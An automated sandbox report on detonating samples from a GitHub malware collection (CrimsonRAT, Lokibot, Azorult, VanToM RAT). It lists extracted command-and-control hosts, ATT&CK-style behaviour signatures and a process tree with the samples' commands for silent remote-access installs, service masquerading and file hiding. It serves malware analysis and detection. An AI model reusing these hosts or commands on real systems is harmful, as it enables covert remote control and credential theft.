Analysis
-
max time kernel
896s -
max time network
901s -
platform
windows11-21h2_x64 -
resource
win11-20241023-en -
resource tags
-
submitted
31-01-2025 09:54
General
-
Target
https://github.com/enginestein/Virus-Collection
Malware Config
Extracted
crimsonrat
185.136.161.124
Extracted
azorult
http://boglogov.site/index.php
Extracted
lokibot
http://blesblochem.com/two/gates1/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
CrimsonRAT main payload 1 IoCs
-
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Crimsonrat family
-
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
-
Lokibot family
-
Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 9 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
Rms family
-
UAC bypass 3 TTPs 5 IoCs
-
Windows security bypass 2 TTPs 10 IoCs
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies boot configuration data using bcdedit 1 TTPs 16 IoCs
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
-
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file 15 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
-
Modifies Windows Firewall 2 TTPs 24 IoCs
-
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
-
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 4 TTPs
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 47 IoCs
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 62 IoCs
-
Modifies system executable filetype association 2 TTPs 2 IoCs
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Modifies WinLogon 2 TTPs 7 IoCs
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 64 IoCs
-
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 37 IoCs
-
Drops file in Windows directory 20 IoCs
-
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 15 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 28 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 8 IoCs
-
Enumerates system info in registry 2 TTPs 9 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 54 IoCs
-
NTFS ADS 28 IoCs
-
Opens file in notepad (likely ransom note) 2 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 11 IoCs
-
Suspicious behavior: LoadsDriver 3 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 39 IoCs
-
Suspicious behavior: SetClipboardViewer 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 3 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 6 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/enginestein/Virus-Collection1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc89f83cb8,0x7ffc89f83cc8,0x7ffc89f83cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1984 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:32⤵
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5796 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5936 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6152 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Executes dropped EXE
-
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3364 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\VanToM-Rat.bat"C:\Users\Admin\Downloads\VanToM-Rat.bat"2⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1232 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3364 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\Aurora Worm v1-Cracked by RoN1N.exe"C:\Users\Admin\Downloads\Aurora Worm v1-Cracked by RoN1N.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2416 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6780 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\Emotet+Trickbot_comparison.xlsx"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5836 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1860 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6900 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2764 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5828 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5880 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6880 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7088 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\Azorult (1).exe"C:\Users\Admin\Downloads\Azorult (1).exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "5⤵
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"6⤵
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*6⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10006⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own6⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"6⤵
- Launches sc.exe
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
